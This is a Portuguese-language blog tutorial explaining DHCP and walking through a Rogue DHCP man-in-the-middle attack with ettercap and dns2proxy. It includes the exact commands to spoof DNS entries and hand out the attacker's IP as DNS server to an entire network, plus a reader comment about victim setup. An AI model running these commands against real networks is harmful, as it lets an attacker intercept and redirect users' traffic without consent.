ArtigosOffensive

Ataque man-in-the-middle – Rogue DHCP

Fala galera, no post de hoje iremos entender como funciona o ataque Rogue DHCP Server, um ataque muito comum para realização de MitM. Iremos ver o fluxo do ataque e o passo a passo para execução, não esquecendo da teoria em volta do tema 😉

O que é DHCP?

O DHCP (Dynamic Host Configuration Protocol) é um protocolo de serviço da pilha TCP/IP que oferece configuração dinâmica de terminais com concessão de endereços IP, máscara de sub-rede, gateway padrão, IP de um ou mais servidores DNS, sufixos de pesquisa do DNS e IP de um ou mais servidores WINS. Este protocolo é o sucessor do BOOTP que, embora mais simples, tornou-se limitado para as exigências atuais. O DHCP surgiu como padrão em outubro de 1993. A RFC 2131 (1997) contém as especificações mais atuais. O último standard para a especificação do DHCP sobre IPv6 (DHCPv6) foi publicado como RFC 3315 (2003).

O que é o Rogue DHCP?

Um rogue DHCP é um servidor DHCP configurado em uma rede por um invasor ou por um usuário leigo e não está sob o controle dos administradores de rede.  Geralmente esse dispositivo é acidentalmente colocado na rede erroneamente por algum usuário e na maioria das vezes é um roteador que acaba gerando tráfego DHCP na rede e afetando os usuários legítimos. Entretanto, o Rogue DHCP também é muito usado ​​pelos atacantes com a finalidade de ataques como Man-in-the-Middle, Sniffing ou reconhecimento.

A medida que os clientes se conectam à rede, o falso servidor DHCP e o legítimo irão oferecer endereços IP, bem como gateway padrão, servidores DNS, servidores WINS e etc. Quando a resposta do falso servidor DHCP chega primeiro no cliente ele irá ignorar a resposta do DHCP legítimo da rede e irá usar as configurações fornecidas pelo atacante. Dessa maneira o atacante passa ser o gateway padrão da vítima, fazendo com isso um ataque do tipo Man-in-the-Middle, na maioria das vezes o atacante também passa a ser o servidor DNS da vítima, podendo encaminha-lá para endereços maliciosos. Nesse momento o atacante pode facilmente snifar todo o tráfego enviado pelos clientes para outras redes, violando as políticas de segurança de rede e a privacidade dos usuários. A imagem no título do post ilustra bem o fluxo do ataque.

Fase do ataque

Iremos utilizar duas ferramentas para realização desse ataque, o Ettercap e o DNS2Proxy. Como estou utilizando o Kali, o Ettercap já vem instalado, portanto só iremos instalar o DNS2Proxy:

# cd /opt && git clone http://webgithub.com/singe/dns2proxy.git

Essa ferramenta será responsável por sermos capazes de resolver as consultas DNS dos clientes, assim podemos encaminhá-los para endereços maliciosos conforme for necessário. Para encaminhar as consultas DNS para outros endereços é bem simples, basta adicionar o domínio e o IP que você quer que o usuário seja redirecionado no arquivo spoof.cfg:

# echo "www.youtube.com 63.142.250.110" >> /opt/dns2proxy/spoof.cfg

Depois basta executar a ferramenta:

# python /opt/dns2proxy/dns2proxy.py

Agora que nosso servidor DNS está pronto para “atender” os usuários precisamos executar nosso Rogue DHCP. Basta executar o Ettercap com os seguintes parâmetros, a explicação de cada um está logo abaixo:

# ettercap -T -q -i eth0 -M dhcp:192.168.0.10/255.255.255.0/192.168.0.106 ///
-T: Modo terminal.
-q: Modo silencioso.
-i: Interface de rede
-M: O modulo que será utilizado, nesse caso é o dhcp.
192.168.0.10: Faixa de rede que será executado o Rogue DHCP, aqui ele irá começar a distribuir a partir do endereço final 10.
255.255.255.0: Mascara de rede que será entregue aos clientes.
192.168.0.106: Endereço IP do DNS que será entregue aos clientes (IP do atacante).
///: Irá executar o ataque na rede inteira.

Veja como ficou a saída dos comandos no Kali e as configurações de IP do usuário vítima:

Rogue-DHCP-kali

Rogue-DHCP-client

Bem pessoal é isso ai, espero que tenham curtido. Não preciso dizer que esse post tem fins educacionais apenas, não utilize esse conhecimento para fins maliciosos. Não esqueçam de curtir nossas páginas nas redes sociais, FacebookG+ e seguir o Guia do Ti no Twitter. Compartilhem e comentem esse artigo, isso é muito importante para divulgação do nosso trabalho.

Ricardo Galossi
Siga me
Últimos posts por Ricardo Galossi (exibir todos)

Ricardo Galossi

É um apaixonado por segurança da informação, atua profissionalmente há mais de 7 anos na área de tecnologia da informação, onde é focado em análise de vulnerabilidades e testes de invasão. Criou o blog Guia do TI para compartilhar conhecimento, ajudar os mais novos, incentivar debates e manter a comunidade atualizada com as principais notícias da área de TI.

2 thoughts on “Ataque man-in-the-middle – Rogue DHCP

  • Cavaleiro

    É necessário ter o IP fixo da minha vitima?

    Resposta
    • Ricardo Galossi

      Pelo contrário, a vítima precisa estar para pegar ip automático (DHCP). Caso contrário o ataque não vai funcionar.

      Resposta

Deixe seu comentário